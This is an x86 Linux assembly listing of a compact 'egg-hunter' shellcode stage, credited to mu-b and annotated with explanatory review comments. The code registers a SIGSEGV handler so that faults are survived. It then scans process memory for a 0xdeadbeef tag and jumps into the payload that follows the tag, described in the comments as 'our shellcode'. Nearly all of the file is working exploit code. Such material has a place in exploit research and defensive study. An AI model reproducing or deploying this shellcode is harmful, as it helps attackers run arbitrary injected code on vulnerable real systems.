;
; Copyright (c) 2007 by <mu-b@digit-labs.org>
;
; 50-byte 32-bit search&jump-signal springboard - (x86-lnx)
; by mu-b - Oct 2006
;

; Constants: where the scan starts and the 4-byte tag it stops on.
%define __start_addr  0x08102030        ; first address examined by `search`
%define __flag_val    0xdeadbeef        ; 4-byte marker; control transfers 4 bytes past its location

global get_eip                          ; exported label; also installed as the SIGSEGV handler below

; Register roles for the whole snippet (32-bit Linux, int 80h syscalls):
;   ebp - base of the scratch stack. esp is re-derived from it at every
;         entry (`mov esp, ebp` / `lea esp, [ebp-4]`), so the code assumes
;         ebp stays intact, including across signal delivery.
;         NOTE(review): nothing here guarantees that -- verify for the target.
;   ecx - address of get_eip, recovered at runtime (no absolute references)
;   ebx - signal number (11); eax - syscall number (ebx + 37 = 48)
;   edi - current scan address; esi - the 4 bytes loaded from [edi]
;
; Analyst-visible behaviour: a signal(SIGSEGV, ...) syscall that is repeated
; after every memory fault, followed by an indirect jump to the found address.
;
; First-entry prologue. Runs once only: re-entry through the signal handler
; lands at get_eip and never revisits these two instructions.
  mov esp, ebp                          ; esp = ebp (stack base supplied by whoever starts this code)
  push __start_addr                     ; [ebp-4] = first address to scan; consumed by `pop edi` in search

get_eip:
  ; ecx = EIP
  ; call/pop trick: the `call` in __callback pushes the address of do_signal;
  ; subtracting the assemble-time distance (do_signal - get_eip) yields the
  ; address of get_eip itself.
  jmp short __callback

__get_eip_call:
  pop ecx                               ; ecx = address of do_signal (return address pushed by the call)
  lea ecx, [byte ecx-(do_signal-get_eip)] ; ecx = address of get_eip; `byte` forces an 8-bit displacement
  jmp short do_signal

__callback:
  call near __get_eip_call              ; pushes the address of the next label, do_signal

do_signal:
  ; ebx == SIG_SEGV
  ; Reset esp to the slot holding the next scan address. On handler entry
  ; this discards whatever the kernel put on the stack; the handler is never
  ; left via sigreturn, execution simply continues into `search`.
  lea esp, [ebp-4]
  push byte 11                          ; 11 = SIGSEGV
  pop ebx

  ; signal (ebx, ecx);
  ; eax = 11 + 37 = 48, the i386 sys_signal number. The handler is
  ; re-installed on every pass (presumably because this registration is
  ; one-shot -- verify), so a fault inside `search` re-enters at get_eip
  ; instead of terminating the process.
  lea eax, [ebx+37]
  int 80h

search:
  ; search for our shellcode header
  ; Loop invariant: [esp] holds the address to examine next.
  pop edi                               ; edi = address to examine
  lea edx, [edi+1]
  push edx                              ; [esp] = edi + 1: one byte of progress per iteration or per fault
  mov esi, [edi]                        ; 4-byte read; an unmapped edi raises SIGSEGV -> handler at get_eip

  cmp esi, __flag_val
  jnz search                            ; keep scanning until the 4-byte tag matches

finish:
  ; execute our shellcode
  lea edi, [edi+4]                      ; step over the 4-byte tag itself
  jmp edi                               ; indirect transfer to the bytes that follow the tag

